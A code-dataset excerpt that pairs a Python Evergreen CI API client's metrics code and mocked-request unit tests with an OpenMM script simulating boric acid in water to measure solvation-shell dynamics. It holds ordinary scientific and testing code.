'build': self.build.id,
'total_processing_time': self.total_processing_time,
'makespan': self.makespan.total_seconds(),
'wait_time': self.wait_time.total_seconds(),
'total_tasks': self.total_tasks,
'success_count': self.success_count,
'pct_tasks_success': self.pct_tasks_success,
'undispatched_count': self.undispatched_count,
'pct_tasks_undispatched': self.pct_tasks_undispatched,
'failure_count': self.failure_count,
'pct_tasks_failed': self.pct_tasks_failed,
'timed_out_count': self.timed_out_count,
'system_failure_count': self.system_failure_count,
'estimated_build_costs': self.estimated_build_costs,
}
if include_children:
metric['tasks'] = [task.json for task in self.task_list]
return metric
def __str__(self):
"""
Create string version of metrics.
:return: String version of the metrics.
"""
return """Build Id: {build_id}
Total Processing Time: {total_processing_time:.2f}s ({total_processing_time_min:.2f}m)
Makespan: {makespan:.2f}s ({makespan_min:.2f}m)
Wait Time: {waittime:.2f}s ({waittime_min:.2f}m)
Total Tasks: {total_tasks}
Successful Tasks: {success_count} ({success_pct:.2%})
Undispatched Tasks: {undispatched_count} ({undispatched_pct:.2%})
Failed Tasks: {failed_count} ({failed_pct:.2%})
Timeout Tasks: {timeout_count} ({timeout_pct:.2%})
System Failure Tasks: {system_failure_count} ({system_failure_pct:.2%})
Estimated Build Costs: {est_build_costs:.3f}
""".format(
build_id=self.build.id,
total_processing_time=self.total_processing_time,
total_processing_time_min=(self.total_processing_time / 60),
makespan=(self.makespan.total_seconds()),
makespan_min=(self.makespan.total_seconds() / 60),
waittime=(self.wait_time.total_seconds()),
waittime_min=(self.wait_time.total_seconds() / 60),
total_tasks=self.total_tasks,
success_count=self.success_count,
success_pct=self.pct_tasks_success,
undispatched_count=self.undispatched_count,
undispatched_pct=self.pct_tasks_undispatched,
failed_count=self.failure_count,
failed_pct=self.pct_tasks_failed,
timeout_count=self.timed_out_count,
timeout_pct=self.pct_tasks_timed_out,
system_failure_count=self.system_failure_count,
system_failure_pct=self.pct_tasks_system_failure,
est_build_costs=self.estimated_build_costs
).rstrip()
```
#### File: tests/evergreen/test_api.py
```python
import os
import sys
try:
from unittest.mock import MagicMock
except ImportError:
from mock import MagicMock
import pytest
from requests.exceptions import HTTPError
from tenacity import RetryError
import evergreen.api as under_test
try:
from json.decoder import JSONDecodeError
except ImportError: # This doesn't exist in python 2.
pass
class TestRaiseForStatus(object):
@pytest.mark.skipif(
sys.version_info.major == 2,
reason='JSONDecodeError is not used in python2'
)
def test_non_json_error(self, mocked_api):
mocked_response = MagicMock()
mocked_response.json.side_effect = JSONDecodeError('json error', '', 0)
mocked_response.status_code = 500
mocked_response.raise_for_status.side_effect = HTTPError()
mocked_api.session.get.return_value = mocked_response
with pytest.raises(HTTPError):
mocked_api.version_by_id('version_id')
mocked_response.raise_for_status.assert_called_once()
def test_json_errors_are_passed_through(self, mocked_api):
error_msg = 'the error'
mocked_response = MagicMock()
mocked_response.json.return_value = {'error': error_msg}
mocked_response.status_code = 500
mocked_response.raise_for_status.side_effect = HTTPError()
mocked_api.session.get.return_value = mocked_response
with pytest.raises(HTTPError) as excinfo:
mocked_api.version_by_id('version_id')
assert error_msg in str(excinfo.value)
mocked_response.raise_for_status.assert_not_called()
class TestDistrosApi(object):
def test_all_distros(self, mocked_api):
mocked_api.all_distros()
mocked_api.session.get.assert_called_with(url=mocked_api._create_url('/distros'),
params=None, timeout=None)
class TestHostApi(object):
def test_all_hosts(self, mocked_api):
mocked_api.all_hosts()
mocked_api.session.get.assert_called_with(url=mocked_api._create_url('/hosts'), params={},
timeout=None)
def test_all_hosts_with_status(self, mocked_api):
mocked_api.all_hosts(status='success')
mocked_api.session.get.assert_called_with(url=mocked_api._create_url('/hosts'),
params={'status': 'success'}, timeout=None)
class TestProjectApi(object):
def test_all_projects(self, mocked_api):
mocked_api.all_projects()
expected_url = mocked_api._create_url('/projects')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_project_by_id(self, mocked_api):
mocked_api.project_by_id('project_id')
expected_url = mocked_api._create_url('/projects/project_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_recent_version_by_project(self, mocked_api):
mocked_api.recent_version_by_project('project_id')
expected_url = mocked_api._create_url('/projects/project_id/recent_versions')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_patches_by_project(self, mocked_api):
patches = mocked_api.patches_by_project('project_id')
next(patches)
expected_url = mocked_api._create_url('/projects/project_id/patches')
mocked_api.session.get.assert_called_with(url=expected_url, params={'limit': 100},
timeout=None)
def test_commit_queue_for_project(self, mocked_api):
mocked_api.commit_queue_for_project('project_id')
expected_url = mocked_api._create_url('/commit_queue/project_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_test_stats_by_project(self, mocked_api):
after_date = '2019-01-01'
before_date = '2019-02-01'
mocked_api.test_stats_by_project('project_id', after_date, before_date)
expected_url = mocked_api._create_url('/projects/project_id/test_stats')
expected_params = {
'after_date': after_date,
'before_date': before_date,
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
class TestBuildApi(object):
def test_build_by_id(self, mocked_api):
mocked_api.build_by_id('build_id')
expected_url = mocked_api._create_url('/builds/build_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_tasks_by_build(self, mocked_api):
mocked_api.tasks_by_build('build_id')
expected_url = mocked_api._create_url('/builds/build_id/tasks')
mocked_api.session.get.assert_called_with(url=expected_url, params={}, timeout=None)
class TestVersionApi(object):
def test_version_by_id(self, mocked_api):
mocked_api.version_by_id('version_id')
expected_url = mocked_api._create_url('/versions/version_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_builds_by_version(self, mocked_api):
mocked_api.builds_by_version('version_id')
expected_url = mocked_api._create_url('/versions/version_id/builds')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
class TestPatchApi(object):
def test_patch_by_id(self, mocked_api):
mocked_api.patch_by_id('patch_id')
expected_url = mocked_api._create_url('/patches/patch_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
class TestTaskApi(object):
def test_task_by_id(self, mocked_api):
mocked_api.task_by_id('task_id')
expected_url = mocked_api._create_url('/tasks/task_id')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
def test_task_by_id_with_fetch_executions(self, mocked_api):
mocked_api.task_by_id('task_id', fetch_all_executions=True)
expected_url = mocked_api._create_url('/tasks/task_id')
expected_params = {
'fetch_all_executions': True
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task(self, mocked_api):
mocked_api.tests_by_task('task_id')
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task_with_status(self, mocked_api):
mocked_api.tests_by_task('task_id', status='success')
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {
'status': 'success'
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task_with_execution(self, mocked_api):
mocked_api.tests_by_task('task_id', execution=5)
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {
'execution': 5
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
def test_tests_by_task_with_status_and_execution(self, mocked_api):
mocked_api.tests_by_task('task_id', status='success', execution=5)
expected_url = mocked_api._create_url('/tasks/task_id/tests')
expected_params = {
'status': 'success',
'execution': 5
}
mocked_api.session.get.assert_called_with(url=expected_url, params=expected_params,
timeout=None)
class TestOldApi(object):
def test_patch_by_id(self, mocked_api):
mocked_api.manifest('project_id', 'revision')
expected_url = mocked_api._create_old_url('plugin/manifest/get/project_id/revision')
mocked_api.session.get.assert_called_with(url=expected_url, params=None, timeout=None)
class TestLogApi(object):
def test_retrieve_log(self, mocked_api):
mocked_api.retrieve_task_log('log_url')
mocked_api.session.get.assert_called_with(url='log_url', params={}, timeout=None)
def test_retrieve_log_with_raw(self, mocked_api):
mocked_api.retrieve_task_log('log_url', raw=True)
mocked_api.session.get.assert_called_with(url='log_url', params={'text': 'true'},
timeout=None)
class TestCachedEvergreenApi(object):
def test_build_by_id_is_cached(self, mocked_cached_api):
build_id = 'some build id'
another_build_id = 'some other build id'
mocked_cached_api.build_by_id(build_id)
mocked_cached_api.build_by_id(build_id)
mocked_cached_api.build_by_id(another_build_id)
assert mocked_cached_api.session.get.call_count == 2
def test_version_by_id_is_cached(self, mocked_cached_api):
version_id = 'some version id'
another_version_id = 'some other version id'
assert mocked_cached_api.version_by_id(version_id)
assert mocked_cached_api.version_by_id(version_id)
assert mocked_cached_api.version_by_id(another_version_id)
assert mocked_cached_api.session.get.call_count == 2
def test_clear_caches(self, mocked_cached_api):
build_id = 'some build id'
version_id = 'some version id'
assert mocked_cached_api.build_by_id(build_id)
assert mocked_cached_api.version_by_id(version_id)
mocked_cached_api.clear_caches()
assert mocked_cached_api.build_by_id(build_id)
assert mocked_cached_api.version_by_id(version_id)
assert mocked_cached_api.session.get.call_count == 4
class TestRetryingEvergreenApi(object):
def test_no_retries_on_success(self, mocked_retrying_api):
version_id = 'version id'
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == 1
@pytest.mark.skipif(
not os.environ.get('RUN_SLOW_TESTS'),
reason='Slow running test due to retries'
)
def test_three_retries_on_failure(self, mocked_retrying_api):
version_id = 'version id'
mocked_retrying_api.session.get.side_effect = HTTPError()
with pytest.raises(RetryError):
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == under_test.MAX_RETRIES
@pytest.mark.skipif(
not os.environ.get('RUN_SLOW_TESTS'),
reason='Slow running test due to retries'
)
def test_pass_on_retries_after_failure(self, mocked_retrying_api):
version_id = 'version id'
successful_response = mocked_retrying_api.session.get.return_value
mocked_retrying_api.session.get.side_effect = [HTTPError(), successful_response]
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == 2
def test_no_retries_on_non_http_errors(self, mocked_retrying_api):
version_id = 'version id'
mocked_retrying_api.session.get.side_effect = ValueError('Unexpected Failure')
with pytest.raises(ValueError):
mocked_retrying_api.version_by_id(version_id)
assert mocked_retrying_api.session.get.call_count == 1
``` |
{
"source": "JIMonroe/Surface_Affinities_Optimization",
"score": 2
} |
#### File: Surface_Affinities_Optimization/analysis_scripts/ba_get_dynamics_bulk.py
```python
from __future__ import division, print_function
import sys, os
import copy
import numpy as np
import simtk.openmm as mm
import simtk.openmm.app as app
import simtk.unit as u
import parmed as pmd
from parmed.openmm.reporters import NetCDFReporter
from pymbar import mbar
from openmm_surface_affinities_lib import *
import waterlib as wl
from scipy import optimize
#Given a topology and structure file, this script sets up a simulation of a solvated solute
#(this code is for just in bulk!) and periodically kicks off NVE simulations from the NPT
#configurations and temperatures. These NVE simulations are then used to assess dynamics, while
#the trajectory in the NPT can be used to evaluate solute properties in the fully coupled
#ensemble. The below script applies to bulk systems.
def normalExponential(t, A, Tau):
#A function to define a normal exponential for fitting decay of water residency in shells
return A*np.exp(-(t/Tau))
def stretchedExponential(t, A, Tau, B):
#A function to define a stretched exponential for fitting the dipole vector autocorrelation function
return A*np.exp(-(t/Tau)**B)
def doSimDynamics(top, systemRef, integratorRef, platform, prop, temperature, scalexy=False, inBulk=False, state=None, pos=None, vels=None, nSteps=10000000):
#Input a topology object, reference system, integrator, platform, platform properties,
#and optionally state file, positions, or velocities
#If state is specified including positions and velocities and pos and vels are not None, the
#positions and velocities from the provided state will be overwritten
#Does NPT, stopping periodically to run NVE to compute dynamics
#Only the NPT simulation will be saved, not the NVE
#Copy the reference system and integrator objects
system = copy.deepcopy(systemRef)
integrator = copy.deepcopy(integratorRef)
#For NPT, add the barostat as a force
#If not in bulk, use anisotropic barostat
if not inBulk:
system.addForce(mm.MonteCarloAnisotropicBarostat((1.0, 1.0, 1.0)*u.bar,
temperature, #Temperature should be SAME as for thermostat
scalexy, #Set with flag for flexibility
scalexy,
True, #Only scale in z-direction
250 #Time-steps between MC moves
)
)
#If in bulk, have to use isotropic barostat to avoid any weird effects with box changing dimensions
else:
system.addForce(mm.MonteCarloBarostat(1.0*u.bar,
temperature,
250
)
)
#Create new simulation object for NPT simulation
sim = app.Simulation(top.topology, system, integrator, platform, prop, state)
#Also create copies and simulation object for the NVE we will be running
systemNVE = copy.deepcopy(systemRef)
integratorNVE = mm.VerletIntegrator(2.0*u.femtoseconds)
integratorNVE.setConstraintTolerance(1.0E-08)
simNVE = app.Simulation(top.topology, systemNVE, integratorNVE, platform, prop)
#Set the particle positions in the NPT simulation
if pos is not None:
sim.context.setPositions(pos)
#Apply constraints before starting the simulation
sim.context.applyConstraints(1.0E-08)
#Check starting energy decomposition if want
#decompEnergy(sim.system, sim.context.getState(getPositions=True))
#Initialize velocities if not specified
if vels is not None:
sim.context.setVelocities(vels)
else:
try:
testvel = sim.context.getState(getVelocities=True).getVelocities()
print("Velocities included in state, starting with 1st particle: %s"%str(testvel[0]))
#If all the velocities are zero, then set them to the temperature
if not np.any(testvel.value_in_unit(u.nanometer/u.picosecond)):
print("Had velocities, but they were all zero, so setting based on temperature.")
sim.context.setVelocitiesToTemperature(temperature)
except:
print("Could not find velocities, setting with temperature")
sim.context.setVelocitiesToTemperature(temperature)
#Set up the reporter to output energies, volume, etc.
sim.reporters.append(app.StateDataReporter(
'prod_out.txt', #Where to write - can be stdout or file name (default .csv, I prefer .txt)
500, #Number of steps between writes
step=True, #Write step number
time=True, #Write simulation time
potentialEnergy=True, #Write potential energy
kineticEnergy=True, #Write kinetic energy
totalEnergy=True, #Write total energy
temperature=True, #Write temperature
volume=True, #Write volume
density=False, #Write density
speed=True, #Estimate of simulation speed
separator=' ' #Default is comma, but can change if want (I like spaces)
)
)
#Set up reporter for printing coordinates (trajectory)
sim.reporters.append(NetCDFReporter(
'prod.nc', #File name to write trajectory to
500, #Number of steps between writes
crds=True, #Write coordinates
vels=True, #Write velocities
frcs=False #Write forces
)
)
#Identify solute indices and water oxygen indices
soluteInds = []
owInds = []
hw1Inds = []
hw2Inds = []
for res in top.residues:
if res.name not in ['OTM', 'CTM', 'STM', 'NTM', 'SOL']:
for atom in res.atoms:
soluteInds.append(atom.idx)
elif res.name == 'SOL':
for atom in res.atoms:
if atom.name == 'OW':
owInds.append(atom.idx)
elif atom.name == 'HW1':
hw1Inds.append(atom.idx)
elif atom.name == 'HW2':
hw2Inds.append(atom.idx)
print("Solute indices:")
print(soluteInds)
#print("Water oxygen indices:")
#print(owInds)
#print("Water hydrogen (1st) indices:")
#print(hw1Inds)
#print("Water hydrogen (2nd) indices:")
#print(hw2Inds)
#Define cutoffs for solute solvation shells
solShell1Cut = 0.55 #nanometers from all solute atoms (including hydrogens)
solShell2Cut = 0.85
#Create array to store the dynamic information of interest every 0.2 ps (100 steps) for 50 ps
calcSteps = 100
calcTotSteps = 25000
numWats = np.zeros((int(calcTotSteps/calcSteps)+1, 2)) #Number waters that started in shell that are in shell at later time
dipCorrs = np.zeros((int(calcTotSteps/calcSteps)+1, 2)) #Dipole correlation in both solute shells
#Start running dynamics
print("\nRunning NPT simulation with interspersed NVE to find dynamics...")
sim.context.setTime(0.0)
stepChunk = 5000 #Run NVE for 50 ps to find dynamics every 10 ps
countSteps = 0
while countSteps < nSteps:
countSteps += stepChunk
sim.step(stepChunk)
#Record the simulation state so can kick off the NVE simulation
thisState = sim.context.getState(getPositions=True, getVelocities=True)
#Get solute and water oxygen coordinates after wrapping around the solute
coords = thisState.getPositions(asNumpy=True)
boxDims = np.diagonal(thisState.getPeriodicBoxVectors(asNumpy=True))
wrapCOM = np.average(coords[soluteInds], axis=0)
coords = wl.reimage(coords, wrapCOM, boxDims) - wrapCOM
solCoords = coords[soluteInds]
owCoords = coords[owInds]
hw1Coords = coords[hw1Inds]
hw2Coords = coords[hw2Inds]
#Figure out which waters are in the solute solvation shells
shell1BoolMat = wl.nearneighbors(solCoords, owCoords, boxDims, 0.0, solShell1Cut)
shell1Bool = np.array(np.sum(shell1BoolMat, axis=0), dtype=bool)
shell2BoolMat = wl.nearneighbors(solCoords, owCoords, boxDims, solShell1Cut, solShell2Cut)
shell2Bool = np.array(np.sum(shell2BoolMat, axis=0), dtype=bool)
#Count number of waters in each shell (will need for averaging)
thisCount1 = int(np.sum(shell1Bool))
thisCount2 = int(np.sum(shell2Bool))
#print("Found %i waters in shell1"%thisCount1)
#print("Found %i waters in shell2"%thisCount2)
#Loop over waters in shells and compute dipole vectors as references
refDipoles1 = np.zeros((thisCount1, 3))
refDipoles2 = np.zeros((thisCount2, 3))
for k, pos in enumerate(owCoords[shell1Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell1Bool][k], hw2Coords[shell1Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
refDipoles1[k] = thisDip / np.linalg.norm(thisDip)
for k, pos in enumerate(owCoords[shell2Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell2Bool][k], hw2Coords[shell2Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
refDipoles2[k] = thisDip / np.linalg.norm(thisDip)
#Set up the NVE simulation
simNVE.context.setState(thisState)
simNVE.context.setTime(0.0)
#Loop over taking steps to computed dynamics
countStepsNVE = 0
while countStepsNVE <= calcTotSteps:
calcState = simNVE.context.getState(getPositions=True)
#Get solute and water oxygen coordinates after wrapping around the solute
coords = calcState.getPositions(asNumpy=True)
wrapCOM = np.average(coords[soluteInds], axis=0)
coords = wl.reimage(coords, wrapCOM, boxDims) - wrapCOM
solCoords = coords[soluteInds]
owCoords = coords[owInds]
hw1Coords = coords[hw1Inds]
hw2Coords = coords[hw2Inds]
#Count waters that started in each shell that are now in the shell at this time
#No absorbing boundaries
thisbool1Mat = wl.nearneighbors(solCoords, owCoords, boxDims, 0.0, solShell1Cut)
thisbool1 = np.array(np.sum(thisbool1Mat, axis=0), dtype=bool)
thisbool2Mat = wl.nearneighbors(solCoords, owCoords, boxDims, solShell1Cut, solShell2Cut)
thisbool2 = np.array(np.sum(thisbool2Mat, axis=0), dtype=bool)
numWats[int(countStepsNVE/calcSteps),0] += int(np.sum(thisbool1*shell1Bool))
numWats[int(countStepsNVE/calcSteps),1] += int(np.sum(thisbool2*shell2Bool))
#Loop over waters in shells and compute dipole vectors for this configuration
#Adding to sum that we will normalize to find average at each time point
for k, pos in enumerate(owCoords[shell1Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell1Bool][k], hw2Coords[shell1Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
thisDip /= np.linalg.norm(thisDip)
dipCorrs[int(countStepsNVE/calcSteps),0] += (np.dot(thisDip, refDipoles1[k]) / float(thisCount1))
for k, pos in enumerate(owCoords[shell2Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell2Bool][k], hw2Coords[shell2Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
thisDip /= np.linalg.norm(thisDip)
dipCorrs[int(countStepsNVE/calcSteps),1] += (np.dot(thisDip, refDipoles2[k]) / float(thisCount2))
simNVE.step(calcSteps)
countStepsNVE += calcSteps
#Finish normalizing dipole correlations (really cosine of angle between dipole vector at different times)
numWats /= float(int(nSteps/stepChunk))
dipCorrs /= float(int(nSteps/stepChunk))
print("Normalizing factor for finding averages: %f"%float(int(nSteps/stepChunk)))
#And save the final state of the NPT simulation in case we want to extend it
sim.saveState('nptDynamicsState.xml')
#And return the dipole correlations and times at which they were computed
timeVals = 0.002*np.arange(0.0, calcTotSteps+0.0001, calcSteps)
return numWats, dipCorrs, timeVals
def main(args):
#Get the structure and topology files from the command line
#ParmEd accepts a wide range of file types (Amber, GROMACS, CHARMM, OpenMM... but not LAMMPS)
try:
topFile = args[0]
strucFile = args[1]
except IndexError:
print("Specify topology and structure files from the command line.")
sys.exit(2)
print("Using topology file: %s" % topFile)
print("Using structure file: %s" % strucFile)
print("\nSetting up system...")
#Load in the files for initial simulations
top = pmd.load_file(topFile)
struc = pmd.load_file(strucFile)
#Transfer unit cell information to topology object
top.box = struc.box[:]
#Set up some global features to use in all simulations
temperature = 298.15*u.kelvin
#Define the platform (i.e. hardware and drivers) to use for running the simulation
#This can be CUDA, OpenCL, CPU, or Reference
#CUDA is for NVIDIA GPUs
#OpenCL is for CPUs or GPUs, but must be used for old CPUs (not SSE4.1 compatible)
#CPU only allows single precision (CUDA and OpenCL allow single, mixed, or double)
#Reference is a clear, stable reference for other code development and is very slow, using double precision by default
platform = mm.Platform.getPlatformByName('CUDA')
prop = {#'Threads': '2', #number of threads for CPU - all definitions must be strings (I think)
'Precision': 'mixed', #for CUDA or OpenCL, select the precision (single, mixed, or double)
'DeviceIndex': '0', #selects which GPUs to use - set this to zero if using CUDA_VISIBLE_DEVICES
'DeterministicForces': 'True' #Makes sure forces with CUDA and PME are deterministic
}
#Create the OpenMM system that can be used as a reference
systemRef = top.createSystem(
nonbondedMethod=app.PME, #Uses PME for long-range electrostatics, simple cut-off for LJ
nonbondedCutoff=12.0*u.angstroms, #Defines cut-off for non-bonded interactions
rigidWater=True, #Use rigid water molecules
constraints=app.HBonds, #Constrains all bonds involving hydrogens
flexibleConstraints=False, #Whether to include energies for constrained DOFs
removeCMMotion=True, #Whether or not to remove COM motion (don't want to if part of system frozen)
)
#Set up the integrator to use as a reference
integratorRef = mm.LangevinIntegrator(
temperature, #Temperature for Langevin
1.0/u.picoseconds, #Friction coefficient
2.0*u.femtoseconds, #Integration timestep
)
integratorRef.setConstraintTolerance(1.0E-08)
#Get solute atoms
soluteIndices = []
for res in top.residues:
if res.name not in ['OTM', 'CTM', 'STM', 'NTM', 'SOL']:
for atom in res.atoms:
soluteIndices.append(atom.idx)
print("\nSolute indices: %s" % str(soluteIndices))
#JUST for boric acid, add a custom bonded force
#Couldn't find a nice, compatible force field, but did find A forcefield, so using it
#But has no angle terms on O-B-O and instead a weird bond repulsion term
#This term also prevents out of plane bending
#Simple in our case because boric acid is symmetric, so only need one parameter
#Parameters come from Otkidach and Pletnev, 2001
#Here, Ad = (A^2) / (d^6) since Ai and Aj and di and dj are all the same
#In the original paper, B-OH bond had A = 1.72 and d = 0.354
#Note that d is dimensionless and A should have units of (Angstrom^3)*(kcal/mol)^(1/2)
#These units are inferred just to make things work out with kcal/mol and the given distance dependence
bondRepulsionFunction = 'Ad*(1.0/r)^6'
BondRepulsionForce = mm.CustomBondForce(bondRepulsionFunction)
BondRepulsionForce.addPerBondParameter('Ad') #Units are technically kJ/mol * nm^6
baOxInds = []
for aind in soluteIndices:
if top.atoms[aind].type == 'oh':
baOxInds.append(aind)
for i in range(len(baOxInds)):
for j in range(i+1, len(baOxInds)):
BondRepulsionForce.addBond(baOxInds[i], baOxInds[j], [0.006289686])
systemRef.addForce(BondRepulsionForce)
#Setting up the alchemical system so we can repeat the calculation with a decoupled particle
#We need to add a custom non-bonded force for the solute being alchemically changed
#Will be helpful to have handle on non-bonded force handling LJ and coulombic interactions
NBForce = None
for frc in systemRef.getForces():
if (isinstance(frc, mm.NonbondedForce)):
NBForce = frc
#Turn off dispersion correction since have interface
NBForce.setUseDispersionCorrection(False)
forceLabelsRef = getForceLabels(systemRef)
decompEnergy(systemRef, struc.positions, labels=forceLabelsRef)
#Separate out alchemical and regular particles using set objects
alchemicalParticles = set(soluteIndices)
chemicalParticles = set(range(systemRef.getNumParticles())) - alchemicalParticles
#Define the soft-core function for turning on/off LJ interactions
#In energy expressions for CustomNonbondedForce, r is a special variable and refers to the distance between particles
#All other variables must be defined somewhere in the function.
#The exception are variables like sigma1 and sigma2.
#It is understood that a parameter will be added called 'sigma' and that the '1' and '2' are to specify the combining rule.
softCoreFunction = '4.0*lambdaLJ*epsilon*x*(x-1.0); x = (1.0/reff_sterics);'
softCoreFunction += 'reff_sterics = (0.5*(1.0-lambdaLJ) + ((r/sigma)^6));'
softCoreFunction += 'sigma=0.5*(sigma1+sigma2); epsilon = sqrt(epsilon1*epsilon2)'
#Define the system force for this function and its parameters
SoftCoreForce = mm.CustomNonbondedForce(softCoreFunction)
SoftCoreForce.addGlobalParameter('lambdaLJ', 1.0) #Throughout, should follow convention that lambdaLJ=1.0 is fully-interacting state
SoftCoreForce.addPerParticleParameter('sigma')
SoftCoreForce.addPerParticleParameter('epsilon')
#Will turn off electrostatics completely in the original non-bonded force
#In the end-state, only want electrostatics inside the alchemical molecule
#To do this, just turn ON a custom force as we turn OFF electrostatics in the original force
ONE_4PI_EPS0 = 138.935456 #in kJ/mol nm/e^2
soluteCoulFunction = '(1.0-(lambdaQ^2))*ONE_4PI_EPS0*charge/r;'
soluteCoulFunction += 'ONE_4PI_EPS0 = %.16e;' % (ONE_4PI_EPS0)
soluteCoulFunction += 'charge = charge1*charge2'
SoluteCoulForce = mm.CustomNonbondedForce(soluteCoulFunction)
#Note this lambdaQ will be different than for soft core (it's also named differently, which is CRITICAL)
#This lambdaQ corresponds to the lambda that scales the charges to zero
#To turn on this custom force at the same rate, need to multiply by (1.0-lambdaQ**2), which we do
SoluteCoulForce.addGlobalParameter('lambdaQ', 1.0)
SoluteCoulForce.addPerParticleParameter('charge')
#Also create custom force for intramolecular alchemical LJ interactions
#Could include with electrostatics, but nice to break up
#We could also do this with a separate NonbondedForce object, but it would be a little more work, actually
soluteLJFunction = '4.0*epsilon*x*(x-1.0); x = (sigma/r)^6;'
soluteLJFunction += 'sigma=0.5*(sigma1+sigma2); epsilon=sqrt(epsilon1*epsilon2)'
SoluteLJForce = mm.CustomNonbondedForce(soluteLJFunction)
SoluteLJForce.addPerParticleParameter('sigma')
SoluteLJForce.addPerParticleParameter('epsilon')
#Loop over all particles and add to custom forces
#As we go, will also collect full charges on the solute particles
#AND we will set up the solute-solute interaction forces
alchemicalCharges = [[0]]*len(soluteIndices)
for ind in range(systemRef.getNumParticles()):
#Get current parameters in non-bonded force
[charge, sigma, epsilon] = NBForce.getParticleParameters(ind)
#Make sure that sigma is not set to zero! Fine for some ways of writing LJ energy, but NOT OK for soft-core!
if sigma/u.nanometer == 0.0:
newsigma = 0.3*u.nanometer #This 0.3 is what's used by GROMACS as a default value for sc-sigma
else:
newsigma = sigma
#Add the particle to the soft-core force (do for ALL particles)
SoftCoreForce.addParticle([newsigma, epsilon])
#Also add the particle to the solute only forces
SoluteCoulForce.addParticle([charge])
SoluteLJForce.addParticle([sigma, epsilon])
#If the particle is in the alchemical molecule, need to set it's LJ interactions to zero in original force
if ind in soluteIndices:
NBForce.setParticleParameters(ind, charge, sigma, epsilon*0.0)
#And keep track of full charge so we can scale it right by lambda
alchemicalCharges[soluteIndices.index(ind)] = charge
#Now we need to handle exceptions carefully
for ind in range(NBForce.getNumExceptions()):
[p1, p2, excCharge, excSig, excEps] = NBForce.getExceptionParameters(ind)
#For consistency, must add exclusions where we have exceptions for custom forces
SoftCoreForce.addExclusion(p1, p2)
SoluteCoulForce.addExclusion(p1, p2)
SoluteLJForce.addExclusion(p1, p2)
#Only compute interactions between the alchemical and other particles for the soft-core force
SoftCoreForce.addInteractionGroup(alchemicalParticles, chemicalParticles)
#And only compute alchemical/alchemical interactions for other custom forces
SoluteCoulForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)
SoluteLJForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)
#Set other soft-core parameters as needed
SoftCoreForce.setCutoffDistance(12.0*u.angstroms)
SoftCoreForce.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
SoftCoreForce.setUseLongRangeCorrection(False)
systemRef.addForce(SoftCoreForce)
#Set other parameters as needed - note that for the solute force would like to set no cutoff
#However, OpenMM won't allow a bunch of potentials with cutoffs then one without...
#So as long as the solute is smaller than the cut-off, won't have any problems!
SoluteCoulForce.setCutoffDistance(12.0*u.angstroms)
SoluteCoulForce.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
SoluteCoulForce.setUseLongRangeCorrection(False)
systemRef.addForce(SoluteCoulForce)
SoluteLJForce.setCutoffDistance(12.0*u.angstroms)
SoluteLJForce.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
SoluteLJForce.setUseLongRangeCorrection(False)
systemRef.addForce(SoluteLJForce)
#First do simulation with fully coupled state
SoftCoreForce.setGlobalParameterDefaultValue(0, 1.0)
SoluteCoulForce.setGlobalParameterDefaultValue(0, 1.0)
for k, ind in enumerate(soluteIndices):
[charge, sig, eps] = NBForce.getParticleParameters(ind)
NBForce.setParticleParameters(ind, alchemicalCharges[k]*1.0, sig, eps)
forceLabelsRef = getForceLabels(systemRef)
decompEnergy(systemRef, struc.positions, labels=forceLabelsRef)
os.mkdir('coupled')
os.chdir('coupled')
#Do NVT simulation
stateFileNVT, stateNVT = doSimNVT(top, systemRef, integratorRef, platform, prop, temperature, pos=struc.positions)
#And do NPT simulation using state information from NVT
stateFileNPT, stateNPT = doSimNPT(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNVT)
#Now perform dynamics simulation to get dynamics - this is defined here, NOT in openmm_surface_affinities_lib.py
numShellWaters, dipoleCosAng, timePoints = doSimDynamics(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNPT)
#Finally, want to now save the water residency over time and then also fit to exponential decay
np.savetxt("shell_watCounts_coupled.txt", np.hstack((np.array([timePoints]).T, numShellWaters)),
header="Time (ps) Number waters in the 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,0]/numShellWaters[0,0])
decayTime1 = opt1[1]
